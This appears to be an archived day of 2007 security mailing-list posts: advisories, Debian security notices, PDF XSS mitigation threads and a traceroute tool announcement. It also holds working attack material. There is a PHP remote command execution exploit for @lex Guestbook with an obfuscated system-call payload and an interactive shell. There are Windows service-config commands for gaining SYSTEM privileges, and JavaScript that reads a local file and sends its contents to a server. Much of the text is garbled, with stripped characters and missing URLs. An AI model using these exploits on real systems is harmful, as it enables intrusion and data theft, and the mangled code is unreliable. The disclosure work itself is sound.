Re: OpenPinboard = Remote File Include

2007-01-08 Thread jgraef

I checked the code of 2.0 and 2.0.1 and tested it. There is no risk of Code 

If you are still unsure mail me.

0trace - traceroute on established connections

2007-01-08 Thread Michal Zalewski
I'd like to announce the availability of a free security reconnaissance /
firewall bypassing tool called 0trace. This tool enables the user to
perform hop enumeration (traceroute) within an established TCP
connection, such as a HTTP or SMTP session. This is opposed to sending
stray packets, as traceroute-type tools usually do.

The important benefit of using an established connection and matching TCP
packets to send a TTL-based probe is that such traffic is happily allowed
through by many stateful firewalls and other defenses without further
inspection (since it is related to an entry in the connection table).

I'm not aware of any public implementations of this technique, even though
the concept itself is making rounds since 2000 or so; because of this, I
thought it might be a good idea to give it a try.

[ Of course, I might be wrong, but Google seems to agree with my
  assessment. A related use of this idea is 'firewalk' by Schiffman and
  Goldsmith, a tool to probe firewall ACLs; another utility called
  'tcptraceroute' by Michael C. Toren implements TCP SYN probes, but since
  the tool does not ride an existing connection, it is less likely to
  succeed (sometimes a handshake must be completed with the NAT device
  before any traffic is forwarded). ]

A good example of the difference is ( - a
regular UDP/ICMP traceroute and tcptraceroute both end like this:

14 (  ...
15 ( ...
16  * * *
17  * * *
18  * * *

Let's do the same using 0trace: we first manually telnet to
to port 80, then execute: './ eth0', and finally
enter 'GET / HTTP/1.0' (followed by a single, not two newlines) to solicit
some client-server traffic but keep the session alive for the couple of
seconds 0trace needs to complete the probe.

The output is as follows:

17 ---
18 --- new data
19  ---
Target reached.

The last three lines reveal firewalled infrastructure, including private
addresses used on the inside of the company. This is obviously an
important piece of information as far as penetration testing is concerned.

Of course, 0trace won't work everywhere and all the time. The tool will
not produce interesting results in the following situations:

  - Target's firewall drops all outgoing ICMP messages,

  - Target's firewall does TTL or full-packet rewriting,

  - There's an application layer proxy / load balancer in the way
(Akamai, in-house LBs, etc),

  - There's no notable layer 3 infrastructure behind the firewall.

The tool also has a fairly distinctive TCP signature, and as such, it can
be detected by IDS/IPS systems.

Enough chatter - the tool is available here (Linux version):

Note: this is a 30-minute hack that involves C code coupled with a cheesy
shellscript. It may not work on non-Linux systems, and may fail on some
Linuxes, too. It could be improved in a number of ways - so if you like
it, rewrite it.

Many thanks for Robert Swiecki ( for forcing me to
finally give this idea some thought and develop this piece.


Re: [Full-disclosure] 0trace - traceroute on established connections

2007-01-08 Thread Michal Zalewski
On Sun, 7 Jan 2007, Michal Zalewski wrote:

 [ Of course, I might be wrong, but Google seems to agree with my
   assessment. A related use of this idea is 'firewalk' by Schiffman and
   Goldsmith, a tool to probe firewall ACLs; another utility called
   'tcptraceroute' by Michael C. Toren implements TCP SYN probes, but since
   the tool does not ride an existing connection, it is less likely to
   succeed (sometimes a handshake must be completed with the NAT device
   before any traffic is forwarded). ]

Erik Kamerling pointed off-the-list that everybody's favourite Dan
Kaminsky ( did some research on that subject, too; his
'paratrace' followed a similar principle, but relied on the party
correcting out-of-sync retransmissions. I found this approach to give poor
results in today's networks with overzealous commercial packet filters,
and hence, my tool implements an invasive approach where the current
session is trashed with in-sync data to solicit a high response rate.

Still, a credit is due!


@lex Guestbook = 4.0.2 Remote Command Execution Exploit

2007-01-08 Thread gmdarkfig

 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from

 | header @lex Guestbook = 4.0.2 Remote Command Execution Exploit
 | header 
 | status Retrieving the administrator password
 | sploit AdminUsername::root
 | sploit AdminPassword::toor
 | status Trying to get logged in
 | sploit Done
 | status Trying to add a skin
 | sploit Done
 | status Writing the malicious skin
 | $shell whoami
 | darkfig
 | $shell cat /etc/passwd ...

if($argc  2)
print \n-;
print \nAffected.scr..: @lex Guestbook = 4.0.2; // last version 
print \nPoc.ID: 20070107;
print \nType..: PHP Code Execution;
print \nRisk.level: High;
print \;
print \;
print \nCredits...: DarkFig;
print \n-;
print \nUsage.: php xpl.php url;
print \nProxyOptions..: proxhost:proxport proxuser:proxpass;
print \nExample...: php xpl.php;;
print \n-\n;


$xpl = new phpsploit();
if(!empty($prs)) $xpl-proxy($prs);
if(!empty($pra)) $xpl-proxyauth($pra);

 | index.php
 | =
 | ... include($chem_absolu.include/livre_include..$alex_livre_ext);
 | livre_include.php - Local File Inclusion
 | =
 | ... set_magic_quotes_runtime(0); // thx =)
 | ... if (isset($_GET['lang'])  $_GET['lang']  
 | $f_language = str_replace(..,,$_GET['lang']); // We can't use  
because of file_exists() verification but ... =]
 | include($chem_absolu.languages/.$f_language...$alex_livre_ext);
 |  index.php - SQL Injection
 |  =
 |  ... sql_select_query(msg, alex_livre_txt_lang, WHERE 
lang='.$f_language.' and `type`='titre'); 
 |  // SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and 

$sql = index.php?lang=english.php%00'%20union%20select%20.
print \nheader @lex Guestbook = 4.0.2 Remote Command Execution Exploit;
print \nheader ;
print \nstatus Retrieving the administrator password;

print \nsploit AdminUsername::.$count[1].\nsploit 
else die(\nsploit Exploit failed);

print \nstatus Trying to get logged in;
print \nsploit Done;
else die(\nsploit Exploit failed);

print \nstatus Trying to add a skin;
// skins.php ... @mkdir($chem_absolu.templates/skins/.$_POST['aj_skin']./, 
if(!preg_match('#alert\(ERREUR\n#',$xpl-getcontent())) print \nsploit Done;
else die(\nsploit Exploit failed);

$scode = chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)..

$data  = skin_edit=skins.php%3Ff_sid%3D.$sid[1].%26skin_edit.
 %3D../../languages/d4h4x0rskinalex_livre=[EMAIL PROTECTED].

print \nstatus Writing the malicious skin\n\$shell ;
// skins.php ... 

while(!preg_match(#^(quit|exit)$#,($cmd = trim(fgets(STDIN)
print $xpl-getcontent();
print \n\$shell ;

AJLogin v3.5 Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
AJLogin v3.5 Remote Password Disclosure Vulnerability

#Software: AJLogin

#Version: 3.5


#Found by: beks

#Risk: Medium


EMembersPro 1.0 Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
EMembersPro 1.0 Remote Password Disclosure Vulnerability

#Software: EMembersPro

#Version: 1.0


#Found by: beks

#Risk: Medium


MitiSoft Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
MitiSoft Remote Password Disclosure Vulnerability

#Software: MitiSoft


#Found by: beks

#Risk: Medium


HarikaOnline v2.0 Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
HarikaOnline v2.0 Remote Password Disclosure Vulnerability

#Software: HarikaOnline

#Version: 2.0


#Found by: beks

#Risk: Medium


Webulas Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
Webulas Remote Password Disclosure Vulnerability

#Software: Webulas


#Found by: beks

#Risk: Medium


Uguestbook Remote Password Disclosure Vulnerability

2007-01-08 Thread beks
Uguestbook Remote Password Disclosure Vulnerability

#Software: Uguestbook

#Version: 1.0


#Found by: beks

#Risk: Medium


NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

2007-01-08 Thread xorontr

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity


Author: xoron



if (isset($custom_admin_path))
$special_admin_path = $custom_admin_path;

$special_admin_path = news/admin;







Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum..!


# [2007-01-06]

[SECURITY] [DSA 1245-1] New proftpd packages fix denial of service

2007-01-08 Thread Moritz Muehlenhoff
Hash: SHA1

- --
Debian Security Advisory DSA 1245-1[EMAIL PROTECTED] Moritz Muehlenhoff
January 7th, 2006
- --

Package: proftpd
Vulnerability  : programming error
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2005-4816
Debian Bug : 404751

Martin Loewer discovered that the proftpd FTP daemon is vulnerable to
denial of service if the addon module for Radius authentication is enabled.

For the stable distribution (sarge) this problem has been fixed in
version 1.2.10-15sarge4.

For the upcoming stable distribution (etch) this problem has been
fixed in version 1.2.10+1.3.0rc5-1.

For the unstable distribution (sid) this problem has been fixed in
version 1.2.10+1.3.0rc5-1.

We recommend that you upgrade your proftpd package.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:
  Size/MD5 checksum:  897 4bb3486da273b7f246396e54a672298d
  Size/MD5 checksum:   128904 accf444b76dd76b0bf076ada64195e81
  Size/MD5 checksum:   920495 7d2bc5b4b1eef459a78e55c027a4f3c4

  Architecture independent components:
  Size/MD5 checksum:   418032 6c5b89cdad81b31913de87105841dd1e

  Alpha architecture:
  Size/MD5 checksum:   80 fc8e4d8b8060b9fe582559c7b14af8e7
  Size/MD5 checksum:   200968 9a870951184988f72d9012379a6eaf7a
  Size/MD5 checksum:   457318 6aa9809aee60ee2d6151927f5916ce34
  Size/MD5 checksum:   476904 b04b43ec13b396b40e305279e8a980e3
  Size/MD5 checksum:   476558 7ac9fb101fa756968c958f5bf47c7686

  AMD64 architecture:
  Size/MD5 checksum:   389254 6bd512cb4bd2f8a264a4689a67a14bb9
  Size/MD5 checksum:   194764 9f113824505cce070eeec9379c9dc885
  Size/MD5 checksum:   400208 17f8fbcab75c416bdc0c3814637f48d4
  Size/MD5 checksum:   415544 5315d8e9649fe27f5c1903d07c10b578
  Size/MD5 checksum:   415324 00b57a27a56deb76e0a1e39073b6cd25

  ARM architecture:
  Size/MD5 checksum:   374112 0965c04c1ce8378f51dc14fa3882d8d4
  Size/MD5 checksum:   188926 09d5f8d90fbd6226a589e8ebd1779347
  Size/MD5 checksum:   384246 3bf4887215a5b15f605c9208716bc039
  Size/MD5 checksum:   399130 6078dc20a109f70eea10bec067933227
  Size/MD5 checksum:   398920 fb5286540adc5baa2a768c44ed81b350

  HP Precision architecture:
  Size/MD5 checksum:   

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Amit Klein

James Landis wrote:

More notes on Amit's remediation algorithm:

Putting all of the identifying information into the token weakens the 
defense because the attacker can mount known plaintext attacks against 
Not precisely. First, the classic definition of known plaintext 
attacks is that an attacker can observe both the plaintext and the 
ciphertext, In our case, the attacker does see ciphertext, but he/she 
does not exactly see the plaintext. Obviously the IP is known, and the 
server time is known up to some granularity, but if (say) you use the 
microsecond clock, then an attacker will have a hard time guessing the 
*exact* plaintext.

I don't think known-plaintext attack should worry you if you use an 
industrial strength encryption, but if you feel like hardening the 
algorithm against this attack, you can always throw in a random number, 
or a secret string as part of the plaintext, and discard it upon decryption.
Putting things in perspective, even if the attacker breaks the 
encryption algorithm, they still have to know the IP address of the 
target. However, a sufficiently clever attacker will simply create a 
phishing scam which harvests IPs and creates custom URLs for each 
victim. The algorithm will also be weakened against individually 
targeted attacks because like you said, it does not protect users 
which appear to come from the same IP to the Web server.

Even if the attacker knows the exact IP address of the victim, I don't 
see how this helps much. A good encryption algorithm will withstand a 
known plaintext attack. And since the attacker cannot fake TCP traffic 
coming from the victim's IP (unless the attacker and victim go out to 
the Internet from the same IP, or unless the attacker uses IP spoofing 
techniques not suitable for our kind of attacks), I don't see how the 
attacker can acquire a valid token for the attack.
Amit's solution is a tradeoff with maintaining state for the unique 
tokens described by RSnake. Unique tokes or nonces are a more secure 
solution but using them incurs the additional overhead of tracking the 
nonces. Amit's algorithm has no tracking overhead.
Why are they secure? Please consider the attack scheme I described in


Dayfox Blog Remote File Include Vuln.

2007-01-08 Thread ShaFuq31
# BhhGroup.Org  Bilgi-Yonetimi.Org.Tr

# script name : Dayfox Blog

# Script Download :

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

#Vuln :[sheLL][sheLL][sheLL]

# Thanks : 4LL bL4ck h4t us3rs  my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Re: Perforce client: security hole by design

2007-01-08 Thread The Fungi
On Thu, Jan 04, 2007 at 08:03:34PM +0100, Ben Bucksch wrote:
 = Proposed fix =
 The problem at hand could be easily fixed by letting the client check 
 out only in the current directory (or one specified by the user on the 
 commandline or GUI, preferences stored locally), no matter what the 
 server says. It may put files anywhere underneath that directory, but 
 never higher or otherwise outside. It must never adhere to absolute 
 paths from the server. This does require some changes to how client 
 specs work, though.

Having not used the product, it's hard to say, but it sounds like
chrooting the client differently for each project on which you're
using it would be a suitable hack to provide a workaround, if a
slightly inefficient one. Of course, I agree this is no substitute
for fixing the application design (and likewise the behavior of the
developers responsible).
{ IRL(Jeremy_Stanley); PGP(9E8DFF2E4F5995F8FEADDC5829ABF7441FB84657);
AIM(dreadazathoth); YAHOO(crawlingchaoslabs); FINGER([EMAIL PROTECTED]);

GeoBB Georgian Bulletin Board Remote File Include Vuln.

2007-01-08 Thread ShaFuq31
# BhhGroup.Org  Bilgi-Yonetimi.Org.Tr

# script name : GeoBB Georgian Bulletin Board

# Script Download :

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

Vuln. Code:

#Vuln :[sheLL]

# Thanks : 4LL bL4ck h4t us3rs  my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Re: SAP Security Contact

2007-01-08 Thread Ansgar -59cobalt- Wiechers

On 2007-01-05 Thor (Hammer of God) wrote:
 You guys might want to put that on your web site.  Probably somewhere
 under Contact Us so that it is easy to, um, contact you specifically
 for security issues.
 Something like [EMAIL PROTECTED] may seem obvious, but it's better if
 you list specific contact info so it can be easily found.

security@ is one of the role mailboxes specified by RFC 2142, so it
really *is* that obvious. However, I agree that despite of this it would
be better practice to put the address on the web site. Even more since
proper use of role mailboxes seems to have become the exception rather
than the rule nowadays.

Ansgar Wiechers
All vulnerabilities deserve a public fear period prior to patches
becoming available.
--Jason Coombs on Bugtraq

TK53 Advisory #1: CenterICQ remote DoS buffer overflow in LiveJournal handling

2007-01-08 Thread Lolek of TK53

   TK53 Advisory #1 01/07/2007

   - CenterICQ remote DoS buffer overflow in Livejournal handling

* Authors: Lolek of TK53 [EMAIL PROTECTED], Roflek of TK53

* Affected program: CenterICQ (

* Affected versions: 4.9.11 - 4.21.0

* Overwiew:
 CenterICQ contains support for LiveJournal (,
 such as posting to your own blog, reading other blogs' RSS feeds, and other
 community-related functions, such as showing whether a user has added or
 removed your own users to/from the friend list, all via a unified HTTP
 interface provided by LiveJournal. The latter functionality is vulnerable
 to a buffer overflow and possible remote code execution.

== Vulnerability Details ==

char buf[512];
   if(find(friendof.begin(), friendof.end(), in-first) ==
friendof.end()) {

   if(!foempty) {
   bd = (string) http://; +
conf.getourid(proto).server + /users/ + in-first;

   sprintf(buf, _(The user %s (%s) has added you to
his/her friend list\n\nJournal address: %s),
   in-first.c_str(), in-second.c_str(), bd.c_str());, buf));

CenterICQ regularly checks the server for the friends list (#define
PERIOD_FRIENDS 3600, which means that the check is done every 3600 seconds).

If a user is in the friend list of at least one user, and another user adds the
user to his friend list, foempty gets true, and the sprintf is called, leading
to a buffer overflow in buf. The length of the username (in-first) or the
realname (in-second) are totally unchecked. This means that this will overflow
if: 2*length(username) + length(realname) + length(string literals) =

The only reason why this is not exploitable with the official LiveJournal
servers is because LiveJournal has a length restriction on both the username (15
characters) and the real name (50 characters). But since the server that is used
for communication is configurable within CenterICQ, and since LiveJournal
provides its backend under the GPL, the risk for buffer overflow and
exploitation does exist.

== Proof of Concept Exploit ==

add the following to your ~/.centericq/conf
lj_nick randomname
lj_pass randompass
lj_server   localhost:8000
lj_status   o

Start the following shell script, then CenterICQ and be patient because of
PERIOD_FRIENDS (3600 seconds, 1 hour) time (or make it 10 or whatever in the
code and recompile).

The following shell script is a very simple proof-of-concept demonstration of
the buffer overflow:

--- SNIP ---

cat  req1.txt  __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday,
07-Mar-2007 11:51:50 GMT;; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

LJ Maintenance
LJ Spotlight
LiveJournal News

cat  req2.txt  __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday,
07-Mar-2007 11:51:50 GMT;; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

LJ Maintenance
LJ Spotlight
LiveJournal News

cat  req3.txt  __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday,
07-Mar-2007 11:51:50 GMT;; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Martin O'Neal

This also works for the affected versions of Opera mentioned elsewhere
on the list (9.10, 8.54)...

-Original Message-
From: Martin O'Neal [mailto:[EMAIL PROTECTED] 
Sent: 04 January 2007 17:59
Subject: RE: [WEB SECURITY] Universal XSS with PDF files: highly

I've had a better look at this now, and there seems to be a generic
server side solution through the content-disposition header (at least
for the versions of Firefox and IE which I have tested).  If it is
specified, the default installs of both products always produce a
download dialog and don't open inline.

Sample apache config for mitigation:

IfModule mod_headers.c
  FilesMatch \.pdf$
Header append Content-disposition attachment;


The Web Security Mailing List:

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Any review, retransmission, dissemination or other use of, or taking
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other than the intended recipient(s) is prohibited.  If you have
received this e-mail in error please notify the sender immediately
and destroy the material whether stored on a computer or otherwise.
DISCLAIMER:  Any views or opinions presented within this e-mail are
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of Corsaire Limited, unless otherwise specifically stated.
Corsaire Limited, 3 Tannery House, Tannery Lane, Send, Surrey, GU23 7EF
Telephone: +44(0)1483-226000  Email:[EMAIL PROTECTED]

MKPortal Full Path Disclosure

2007-01-08 Thread info
MkPortal Full Path Disclosure

Vulnerability discovered by: Demential
E-mail: info[at]burnhead[dot]it
Mkportal website:

Tested on MKPortal M1.1 RC1 with PhpBB
other versions may also be affected.

failed to open stream:
No such file or directory in
D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24

Re: Re: Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread rudeyak
A correction to my previous post: since THE_REQUEST looks like GET 
/foo/bar/baz.pdf HTTP/1.0, the regex used needs to match the space between 
pdf and HTTP, so this mod works better:

RewriteCond %{THE_REQUEST} .*\.pdf[^\wA-Za-z0-9._?%-]

Again, YMMV depending on what characters you expect to be valid trailing .pdf 
in your application.

HP Multiple Products PML Driver Local Privilege Escalation

2007-01-08 Thread Sowhat

HP Multiple Products PML Driver Local Privilege Escalation

By Sowhat of Nevis Labs


Products Affected

HP All-In-One products
HP PSC 700 series
HP PSC 900 series
HP PSC 1100 series
HP PSC 1200 series
HP PSC 1300 series
HP PSC 2100 series
HP PSC 2200 series
HP PSC 2400 Photosmart All-in-one series
HP PSC 2500 Photosmart All-in-one series
HP Officejet D series
HP Officejet G series
HP Officejet K series
HP Officejet 4100 series
HP Officejet 5100 series
HP Officejet 5500 series
HP Officejet 6100 series
HP Officejet 7100 series
HP Color LaserJet 4650 Printer series

and ??? most probably other products are affected


There is a DACL weakness exists in the HP all-in-one products drivers,
which can be exploited by malicious, local users to gain escalated


PML Driver HPZ12 service is installed by lots of the HP products especially
the all-in-one products and some other Printers,Scanners,and Copiers.

Insecure SERVICE_CHANGE_CONFIG permissions on the PML Driver HPZ12 service
can be exploited to gain escalated privileges by changing the associated

The PML Driver HPZ12 is defaultly installed with the following properties:
Name: PML Driver HPZ12
Filename: HPZipm12.exe
Description: Used by HP Printer/Scanner/Copier printers to prevent Windows
from entering hibernation mode.
File Location: %System%
Service Name: PML Driver HPZ12
Service Display Name: PML Driver HPZ12

Because of the Insecure DACL, a local unprivileged user can obtain SYSTEM
privilege through the following way:

C:\sc config pml driver hpz12 binpath= D:\attack\attack.exe
C:\sc start pml driver hpz12

OK, your attack.exe will be lunached under SYSTEM privileges immediately,
system restart is not required.

Even though the PML Driver serivce is not started by default, the attacker
can start and stop it by herself :)

Exploting this vulnerability allows local non-privileged user
to obtain SYSTEM privilege.

Use SC command to set a tight permissions for the PML Driver HPZ12 service.

Vendor Response:

2006.05.29 Vendor notified via [EMAIL PROTECTED]
2006.05.29 Vendor responded
2006.07.20 HP - This is a high priority issue, and is still being
worked.  There are testing
  dependencies that are wider than we expected.
2006.12.20 I saw the an auto update of HP software named PML Driver
Security Update,
  so I sent an email to ask about when it was released, why
they did not let me know.
  they said There has been a communication problem here at
HP, We have not yet issue
  a security bulletin on this problem 
2007.01.08 They did not response to my status query emails after 20th, Dec

Is this HP's Responsible Vulnerability Disclosure Policy?

Life is like a bug, Do you know how to exploit it ?

magic photo storage website Remote File Inclusion

2007-01-08 Thread k1tk4t

# magic photo storage website  Remote File Inclusion
# Vendor:
# Demo Site :
# Found By  : k1tk4t - k1tk4t[4t]
# Location  : Indonesia   --  #newhack[dot]org


require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';



xoron []
and for all(friend'senemy)
#newhack[dot]org [all memberstaff]
#e-c-h-o [all member echo community]
#asiahacker [all member asiahacker community]
#nyubicrew [all member solpotcrew community] -- at

QASEC Announcement: Writing Software Security Test Cases

2007-01-08 Thread bugtraq
I've Just released an article about how the Quality Assurance phase of the 
cycle can incorporate security testing into a standard test plan, and make it 
of the regular testing cycle.

Writing Software Security Test Cases: Putting security test cases into your 
test plan

- Robert

Packeteer PacketWise CLI overflow DoS

2007-01-08 Thread kian . mohageri
Product: Packeteer PacketShaper
Model: 9500/ISP
Software: PacketWise 8.x (possibly others)


Packeteer creates bandwidth management solutions such as the PacketShaper which 
is the ultimate scalable platform for optimized WAN application 
performance—the only all-in-one solution for extending monitoring, shaping, 
acceleration and compression as well as centralized reporting and management 
across the distributed enterprise.


The Packeteer PacketShaper appears to be vulnerable to a buffer overflow which 
can be triggered by a valid command followed by a long argument (around 1500 

# class show /Inbound/A...

There appear to be other places where such behavior can be seen, e.g. via the 
web interface:


Both of these examples require either look or touch access to the device.


The watchdog timer will trigger a unit reset/reboot, which takes around 30 
seconds.  If there is no bypass mechanism in place (e.g. fiber bypass switch), 
service will be interrupted.

Packeteer has not responded to the initial reports.

Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread pdp (architect)

I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use

var img = new Image()
img.src = url;

this should work.

On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:

I'm trying to put together a demonstration of this vulnerability, and how it
could effect corporate security, however I'm encountering a large hangup
when sending a file 'back' to the webserver, the browser same origin policy
denies me the ability to send files to a different domain, which afaik is
necessary for an external attacker to properly exploit this vulnerability:

Here's the code I have so far, based more or less on PDP's

Vanilla, almost' PDP's (different url, spaces removed etc.)
file:///C:/Program Files/Adobe/Acrobat
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState ==
4)alert(xhr.responseText);};'GET', 'file:///C:/Program
Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

What I'm trying to do:
file:///C:/Program Files/Adobe/Acrobat
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState ==
4){alert(xhr.responseText);'GET', '
http://localhost:80/whatever.htm?content=' +
xhr.responseText);xhr2.onreadystatechage = function(){alert('File
Transferred!');};xhr2.send(null);}};'GET', '
file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',

Now, one would think that the LOCAL file operating mode of IE would allow
the cross domain XHR request, however this does not work (tested IE 6) I
think because by default IE disallows Javascript access on the local

Try putting this is IE:
and then try it in FireFox

It won't work in IE 6, but it executes just fine in FireFox.

function cXHR(){ //Grabs a legit XHR.
return new ActiveXObject('Msxml2.XMLHTTP');
return new ActiveXObject('Microsoft.XMLHTTP');
return new XMLHttpRequest();
return null;
var xhr = cXHR(); //For grabbing
var xhr2 = cXHR(); //For sending
xhr.onreadystatechange = function(){
if (xhr.readyState == 4){
alert(xhr.responseText);'GET', '
http://localhost:80/whatever.htm?content=' +
xhr.responseText); //Send it up, yo.
xhr2.onreadystatechage = function(){
alert('File Transferred!');
xhr2.send (null);
};'GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',

Anyone's input on this matter would be appreciated.

On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote:

 Additionally, the public PoC doesn't work on Preview version 3.0.8 (409)
on OS X 10.4.8.

 - Juha-Matti

 Larry Seltzer [EMAIL PROTECTED] wrote:
  According to public reports, this vulnerability is addressed in Adobe
  Acrobat Reader 8.0.
  I've actually tested it. On Reader 8 Acrobat you get a messagebox that
  says This operation is not allowed
  Larry Seltzer Security Center Editor
  Contributing Editor, PC Magazine

 Full-Disclosure - We believe in it.
 Hosted and sponsored by Secunia -

pdp (architect) | petko d. petkov

[SECURITY] [DSA 1246-1] New packages fix arbitrary code execution

2007-01-08 Thread Martin Schulze
Hash: SHA1

- --
Debian Security Advisory DSA 1246-1[EMAIL PROTECTED] Martin Schulze
January 8th, 2007
- --

Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2006-5870
Debian Bug : 405679 405986

John Heasman from Next Generation Security Software discovered a heap
overflow in the handling of Windows Metafiles in, the
free office suite, which could lead to a denial of service and
potentially execution of arbitrary code.

For the stable distribution (sarge) this problem has been fixed in
version 1.1.3-9sarge4.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.4-1.

We recommend that you upgrade your package.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:
  Size/MD5 checksum: 2878 3adfe8b09c20248767fe9d995b3f184c
  Size/MD5 checksum:  4623655 108120f3b365317fa9c47b25a5445fce
  Size/MD5 checksum: 166568714 5250574bad9906b38ce032d04b765772

  Architecture independent components:
  Size/MD5 checksum:  2647376 8704f95d7e844e302abcae4d403f7818
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  Size/MD5 checksum:  3581922 7f69ac15b11613a649a2a08ff1501fd8
  Size/MD5 checksum:  3453208 fcd76abbb9df7cd707e36903e9db1f17
  Size/MD5 checksum:  2741468 ab08c03a0f0d78c3db9c99bd80fe12f1
  Size/MD5 checksum:  3525792 12c71a26f9512295ab442fb63e8711a3
  Size/MD5 checksum:  3560792 9965231fb1b0c3956ddb09255b91c86b
  Size/MD5 checksum:  2645014 baa0a0c809a740273d8dfd87b946d81b
  Size/MD5 checksum:  2667748 740c781dd55cad46fdc52c1926d5854e
  Size/MD5 checksum:  2673164 f8b2c8d335490dcaaf3f1bcb63eb72ec
  Size/MD5 checksum:  3494058 674365c474453cf6590a82c2b2d3d631
  Size/MD5 checksum:  2657584 7ce93bcb8f34a3f05f7560b5631a5ed8

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread pdp (architect)

also, you can use TinyURL to hide entire attack vectors. For example,
the following link contains a harmless exploit (alert message box) for

more about this issue here:

On 1/4/07, Billy Hoffman [EMAIL PROTECTED] wrote:

I think I get what Skarvin is saying. Hopeful we all know that fragments are
not sent with the request, so you cannot stop yourself from serving a PDF
that's about to execute JS code in a fragment. However, social sites and
forum sites can scan their site to see if any user supplied links point to a
PDF with a malicious looking fragment. At the very least they can make sure
they are not being an accomplice to an attack. Of course, some people server
PDF's through file portals (file.php?file=foo.pdf) or use other things that
makes it hard to see if a hyperlink serves a PDF or not.

Billy Hoffman


Lead Researcher, SPI Labs

SPI Dynamics Inc. –

Phone:  678-781-4800

Direct:   678-781-4845


From: Ory Segal [mailto:[EMAIL PROTECTED]
 Sent: Thursday, January 04, 2007 3:40 PM
 To: skarvin
 Subject: RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

Hi Skarvin,

When you click on a link that contains a fragment in it, the browser does
not send that part (everything after the # symbol - including the symbol
itself), to the server. For example: , when clicked, will
send the following request:

GET /page.html HTTP/1.0



So any server side filtering of '#' won't work.

-Ory Segal


From: skarvin [mailto:[EMAIL PROTECTED]
 Sent: Thursday, January 04, 2007 10:07 PM
 To: Billy Hoffman
 Subject: Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

Hello Billy,

 If I write a rule that filters all url with this character -- # in it's
content I think that the problem is solved, but is my opinion.

 Best regards.

2007/1/4, Billy Hoffman [EMAIL PROTECTED]:

You cannot filter this URLs, because a URL fragment denotes something inside
of a resource. The server doesn't care what the fragment it. The HTTP
request sent when you click on a URL with a fragment doesn't contain the
fragment at all. This means a site cannot even implement a web application
firewall or IDS rule to not serve a PDF. They can't tell the different
between a PDF requested for legitimate reasons or a PDF requested as part of
an attack.

Short of removing all PDF's from a website, that site cannot ensure they are
acting as an accomplice to exploit a user.

Fun times,

Billy Hoffman


Lead Researcher, SPI Labs

SPI Dynamics Inc. –

Phone:  678-781-4800

Direct:   678-781-4845


From: skarvin [mailto:[EMAIL PROTECTED]
 Sent: Thursday, January 04, 2007 4:04 AM
 Subject: Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

